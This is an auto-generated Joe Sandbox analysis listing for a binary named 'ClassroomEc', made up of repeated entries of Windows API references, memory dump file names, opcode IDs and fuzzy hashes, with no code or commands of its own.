                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D62435
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6246C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 571936431-0
                                                                                                                                                              • Opcode ID: a8f348085104e0598e1c5565c906dd49fb3d53b3081ac22fe04172611f5302bd
                                                                                                                                                              • Instruction ID: 8f816f4c34c69928be5a362c6e3e569066e3f50e10a3c68153548b593f2e402c
                                                                                                                                                              • Opcode Fuzzy Hash: a8f348085104e0598e1c5565c906dd49fb3d53b3081ac22fe04172611f5302bd
                                                                                                                                                              • Instruction Fuzzy Hash: 55314BB5A0021A8BCB04DF95C991AFF73B5FF64304F144419F816AB291EB34AE64CBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@_wmemmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 328067375-0
                                                                                                                                                              • Opcode ID: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
                                                                                                                                                              • Instruction ID: 9fc1b8f9c7606a76b452b6d9899e43685ee60b10c0e219e4820f58f31627cc04
                                                                                                                                                              • Opcode Fuzzy Hash: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
                                                                                                                                                              • Instruction Fuzzy Hash: 7E11AAF5E00109AFCB04DF98D9959AEF7F5EF48300F248169E809A7355E631EE11CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D636D5
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D636E1
                                                                                                                                                                • Part of subcall function 00D66500: ??2@YAPAXI@Z.MSVCRT ref: 00D6650B
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D63702
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap$??2@_wmemmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4287629685-0
                                                                                                                                                              • Opcode ID: 4e7e7c5396c2d26133971e21a8ea736505215e008678d6acc4ebd2d4022da895
                                                                                                                                                              • Instruction ID: a3eb7d5dbe9d8a531f670d74bbf5fe7791a68025ee9c4e7593222c5cc2f7cfc1
                                                                                                                                                              • Opcode Fuzzy Hash: 4e7e7c5396c2d26133971e21a8ea736505215e008678d6acc4ebd2d4022da895
                                                                                                                                                              • Instruction Fuzzy Hash: 9101DABA900108ABCB08FF94D8A39EEB778EF14344F444159F516661A1EF716E48CBF0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a428452f26b4bad9ffefe7b3396bbdfbea0c2ec55da0ce5a401cc43b0424be5c
                                                                                                                                                              • Instruction ID: 25b2f69d32d6f91d1c873a9b3d5a1bb37df1c1a4cb35857265eead9ba2777eeb
                                                                                                                                                              • Opcode Fuzzy Hash: a428452f26b4bad9ffefe7b3396bbdfbea0c2ec55da0ce5a401cc43b0424be5c
                                                                                                                                                              • Instruction Fuzzy Hash: BCA1F570D01208DFCB14DF98D991AEEBBB2FF48304F28C559E419AB295E734AE45CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                              • Opcode ID: dd775b334539a5d9918ab24e5fc0ca6515c88f662bcb4e44faefb6f2948c7f31
                                                                                                                                                              • Instruction ID: 742c57e6f3bca24fffe20fb771f234e298ced55984b158ed12668efe4decb959
                                                                                                                                                              • Opcode Fuzzy Hash: dd775b334539a5d9918ab24e5fc0ca6515c88f662bcb4e44faefb6f2948c7f31
                                                                                                                                                              • Instruction Fuzzy Hash: 3E111674A14609EFCB18DF98D444AAA77B5AB48300F14C098E84A9B345E630EA45CBB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00D767E2
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D767F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                              • Opcode ID: e231588e75b7eca0156815dd4f2b028a6ba69c291e378abc3aaeeea22f533da9
                                                                                                                                                              • Instruction ID: 7448dc3e9b9627e08573e30b3b7d91e0c8bc7cdc84899b7ae9c31d2fe43f3275
                                                                                                                                                              • Opcode Fuzzy Hash: e231588e75b7eca0156815dd4f2b028a6ba69c291e378abc3aaeeea22f533da9
                                                                                                                                                              • Instruction Fuzzy Hash: D7014075900218ABCB04DFA8D8959DEBBF5EF4C310F24C159E859D7340E630DA41DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00D62FBA
                                                                                                                                                              • EndDialog.USER32(00000000,00000000), ref: 00D6301E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DialogSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2355613043-0
                                                                                                                                                              • Opcode ID: caad23723a7c765e8fa85572f33b4084116e77b76192f6370bbfb65a411d69ef
                                                                                                                                                              • Instruction ID: c27f05c270e87270e9d278479880eb43d0cf1c19091f3f26c431bbcb0c660897
                                                                                                                                                              • Opcode Fuzzy Hash: caad23723a7c765e8fa85572f33b4084116e77b76192f6370bbfb65a411d69ef
                                                                                                                                                              • Instruction Fuzzy Hash: 89014C70A10308EFDB28EF98D855BAAB7B6FB49715F144699E6119B3E0C7315A40CF70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D668BC
                                                                                                                                                              • SetEnvironmentVariableW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00D668EC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugEnvironmentHeapVariable
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1617098807-0
                                                                                                                                                              • Opcode ID: ab172aa233fccee4fb5c5e4286c5c3259599bb5fc407a49a7e6fb5b0c1a83869
                                                                                                                                                              • Instruction ID: 1516741323b836d4818ccce2a73d1a35439da5b73adbcc489aaed4aa693f733b
                                                                                                                                                              • Opcode Fuzzy Hash: ab172aa233fccee4fb5c5e4286c5c3259599bb5fc407a49a7e6fb5b0c1a83869
                                                                                                                                                              • Instruction Fuzzy Hash: 48011DB5D01109EBCF04FBB4D8529BEB379EB54304F5044A9F409E72D2EA31AA049776
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00D6E7ED
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00D6E88E
                                                                                                                                                                • Part of subcall function 00D79C10: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D79C1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 879816989-0
                                                                                                                                                              • Opcode ID: f558c02c5c0bcbe10b177b0b1b534607d49665edc7c39f48c36ea846cc798978
                                                                                                                                                              • Instruction ID: 5667bbd68a092ea0fd4a0a32e74ad8f7805666f2e36b3f144854daa19015f812
                                                                                                                                                              • Opcode Fuzzy Hash: f558c02c5c0bcbe10b177b0b1b534607d49665edc7c39f48c36ea846cc798978
                                                                                                                                                              • Instruction Fuzzy Hash: 7642C374A002288FCB68DF54CC91BEDB7B1BF99304F1481E9E54AA7291DB306E85CF65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D62268
                                                                                                                                                                • Part of subcall function 00D704F0: ??3@YAXPAX@Z.MSVCRT ref: 00D70505
                                                                                                                                                                • Part of subcall function 00D61E40: memset.MSVCRT ref: 00D61E5E
                                                                                                                                                                • Part of subcall function 00D61E40: _DebugHeapAllocator.LIBCPMTD ref: 00D61ED4
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00D89730,?,?,?,00000000,?), ref: 00D622B7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap$??3@ErrorLastmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1417051094-0
                                                                                                                                                              • Opcode ID: 6c1b97c2b90f303772ba27adefdcf54a235239929e2fe9dd92cc7a33cc8f683a
                                                                                                                                                              • Instruction ID: e084c7365593ea4ae9f34ce70c53934a306a621b8be36c43c00fac3a92736b29
                                                                                                                                                              • Opcode Fuzzy Hash: 6c1b97c2b90f303772ba27adefdcf54a235239929e2fe9dd92cc7a33cc8f683a
                                                                                                                                                              • Instruction Fuzzy Hash: 15114F75C102089BDB15FBE1DC669EEB738EF54304F488128B50AA6192FF35AA19CB71
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?), ref: 00D625C0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: dc1e544fed2a1b0dcf9e82ecec3635eeb18f8837990f19aea495cb63ebdd476a
                                                                                                                                                              • Instruction ID: 48fa2ad7b2a3b38aa1d5f0a28a8642b2449d7948156a53dc766c13ca9cd55585
                                                                                                                                                              • Opcode Fuzzy Hash: dc1e544fed2a1b0dcf9e82ecec3635eeb18f8837990f19aea495cb63ebdd476a
                                                                                                                                                              • Instruction Fuzzy Hash: 2201E1706005049BC718DF59D865B7977A6EF48344F448019F90ACB792DB30E990CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: codecvt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3662085145-0
                                                                                                                                                              • Opcode ID: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
                                                                                                                                                              • Instruction ID: c072125b2ea42bb6f554dd91d141df87fddf1975ac5d285053da2e9498eab0f2
                                                                                                                                                              • Opcode Fuzzy Hash: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
                                                                                                                                                              • Instruction Fuzzy Hash: FB01CD70E01109EFCB04EFA8D5456AEB7B1FF48304F2045A9D40567295D7705E40DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,80000000,00000000,?,00D76886,00000000,?,?,00D76886,?,80000000,?,?,?), ref: 00D766F2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 00f82523872f78941978482ad82049d92de8f15b186629c208784b274d0bb5d9
                                                                                                                                                              • Instruction ID: 8887677e2f633982feecbe3ef700967c9b9c8f7c0bae993a04927dc1df4204ab
                                                                                                                                                              • Opcode Fuzzy Hash: 00f82523872f78941978482ad82049d92de8f15b186629c208784b274d0bb5d9
                                                                                                                                                              • Instruction Fuzzy Hash: 5FF0D075614209FBCB04CF94D851EAF77B9EB89351F208658F91997280E631EE11DBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D76AB8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: c9f0526219b996ef6e334b71c866943cba24c6842cc0079aeb46d471723ce141
                                                                                                                                                              • Instruction ID: 3a948c088469c2183892e9aa95b1472cede96b7ef89f11f196c4d22995262207
                                                                                                                                                              • Opcode Fuzzy Hash: c9f0526219b996ef6e334b71c866943cba24c6842cc0079aeb46d471723ce141
                                                                                                                                                              • Instruction Fuzzy Hash: A1F0F9B5904308BFCB04DF98D884A9DBBB9AB89310F10C199F858D7340E631AA45CFB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: codecvt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3662085145-0
                                                                                                                                                              • Opcode ID: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
                                                                                                                                                              • Instruction ID: cbca4cec305cedb81728978d937c6f44085ed16978a74c28d42a665874288d4b
                                                                                                                                                              • Opcode Fuzzy Hash: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
                                                                                                                                                              • Instruction Fuzzy Hash: 0301EC74E44209EFCB08EF98C545AADBBB0FB44344F14C599D8456B345D771AE80DF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: codecvt
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3662085145-0
                                                                                                                                                              • Opcode ID: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
                                                                                                                                                              • Instruction ID: bf0bb764662b2c56416d04a2d9217ca097dbceeeb54f3c3db0fd4fc1e3708869
                                                                                                                                                              • Opcode Fuzzy Hash: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
                                                                                                                                                              • Instruction Fuzzy Hash: DB01C474A0020CEFCB04EFA9C545AADBBB4FB48344F108599E886AB351D770AE80DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(?,00000000,?,00000000,00000000), ref: 00D76914
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 3684dc4e926ab8e4cbd896d8bc576817aed1d033ebfa4064b7a2e5284f5a3e7c
